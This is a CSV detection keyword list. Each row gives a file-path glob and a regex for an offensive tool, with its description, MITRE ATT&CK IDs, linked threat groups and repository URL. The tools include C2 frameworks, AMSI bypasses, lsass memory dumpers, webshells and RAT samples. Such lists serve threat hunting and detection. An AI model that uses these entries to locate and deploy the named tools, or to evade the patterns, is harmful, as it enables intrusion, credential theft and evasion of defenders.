"*/alan.log*",".{0,1000}\/alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","#logfile #linux","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","5269"
"*/Alan.v*.zip*",".{0,1000}\/Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","5270"
"*/Alaris.sln*",".{0,1000}\/Alaris\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","5271"
"*/Alcatraz.exe*",".{0,1000}\/Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5272"
"*/Alcatraz.git*",".{0,1000}\/Alcatraz\.git.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5273"
"*/Alcatraz/files/*/Alcatraz.zip*",".{0,1000}\/Alcatraz\/files\/.{0,1000}\/Alcatraz\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5274"
"*/Alcatraz/x64*",".{0,1000}\/Alcatraz\/x64.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5275"
"*/Alcatraz-gui*",".{0,1000}\/Alcatraz\-gui.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5276"
"*/all/pupyutils/*.py*",".{0,1000}\/all\/pupyutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5277"
"*/All_attack.txt*",".{0,1000}\/All_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5278"
"*/all_in_one_enum.ps1*",".{0,1000}\/all_in_one_enum\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","5279"
"*/allseeingeye-info.nse*",".{0,1000}\/allseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5280"
"*/amass.log*",".{0,1000}\/amass\.log.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","10","N/A","N/A","N/A","N/A","5283"
"*/amass.sqlite*",".{0,1000}\/amass\.sqlite.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","5284"
"*/amass/releases/download/*",".{0,1000}\/amass\/releases\/download\/.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","1","#linux","N/A","5","","N/A","","","","5285"
"*/amass/wordlists*",".{0,1000}\/amass\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5286"
"*/amass_results_owasp.txt*",".{0,1000}\/amass_results_owasp\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","5287"
"*/Amnesiac.git*",".{0,1000}\/Amnesiac\.git.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5289"
"*/Amnesiac.ps1*",".{0,1000}\/Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5290"
"*/amqp-info.nse*",".{0,1000}\/amqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5294"
"*/amsi.py*",".{0,1000}\/amsi\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5295"
"*/Amsi_Bypass_In_2023*",".{0,1000}\/Amsi_Bypass_In_2023.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","5296"
"*/AMSI_patch.git*",".{0,1000}\/AMSI_patch\.git.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","5297"
"*/AmsiBypass.*",".{0,1000}\/AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","5298"
"*/Amsi-Bypass-Powershell.git*",".{0,1000}\/Amsi\-Bypass\-Powershell\.git.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","5299"
"*/Amsi-Killer.git*",".{0,1000}\/Amsi\-Killer\.git.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","5300"
"*/amsikiller.py*",".{0,1000}\/amsikiller\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","5301"
"*/AmsiOpenSession.exe*",".{0,1000}\/AmsiOpenSession\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","5302"
"*/AMSI-Provider.git*",".{0,1000}\/AMSI\-Provider\.git.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","5303"
"*/AMSITrigger.git*",".{0,1000}\/AMSITrigger\.git.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","5305"
"*/amsiwala.exe*",".{0,1000}\/amsiwala\.exe.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5306"
"*/Analyzer-Session.log*",".{0,1000}\/Analyzer\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","#logfile #linux","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","5307"
"*/AndrewSpecial.git*",".{0,1000}\/AndrewSpecial\.git.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","5308"
"*/android/pupydroid/*",".{0,1000}\/android\/pupydroid\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","5309"
"*/AndroRat Binder.exe*",".{0,1000}\/AndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","QUILTED TIGER","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5310"
"*/ANGRYPUPPY.cna*",".{0,1000}\/ANGRYPUPPY\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","5311"
"*/Ani-Shell.php*",".{0,1000}\/Ani\-Shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5312"
"*/Annoying1.exe*",".{0,1000}\/Annoying1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5313"
"*/anonymous rat v1.0.exe*",".{0,1000}\/anonymous\srat\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5314"
"*/Ant Attack.exe*",".{0,1000}\/Ant\sAttack\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5315"
"*/antak.aspx*",".{0,1000}\/antak\.aspx.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","5316"
"*/anthemtotheego/CredBandit*",".{0,1000}\/anthemtotheego\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","5317"
"*/anti_analysis.exe*",".{0,1000}\/anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5318"
"*/anti_debug.exe*",".{0,1000}\/anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5319"
"*/anti_methods/antivm.ps1*",".{0,1000}\/anti_methods\/antivm\.ps1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","5320"
"*/Antichat Shell v1.3.php*",".{0,1000}\/Antichat\sShell\sv1\.3\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5321"
"*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5322"
"*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5323"
"*/AntiTamper.exe*",".{0,1000}\/AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","5324"
"*/antSword.git*",".{0,1000}\/antSword\.git.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5325"
"*/antsword.tar*",".{0,1000}\/antsword\.tar.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5326"
"*/antsword.tar.gz*",".{0,1000}\/antsword\.tar\.gz.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5327"
"*/AntSword/archive/master.tar*",".{0,1000}\/AntSword\/archive\/master\.tar.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5328"
"*/antSword/releases/tag/2*",".{0,1000}\/antSword\/releases\/tag\/2.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","5329"
"*/AntSword_*.php*",".{0,1000}\/AntSword_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5330"
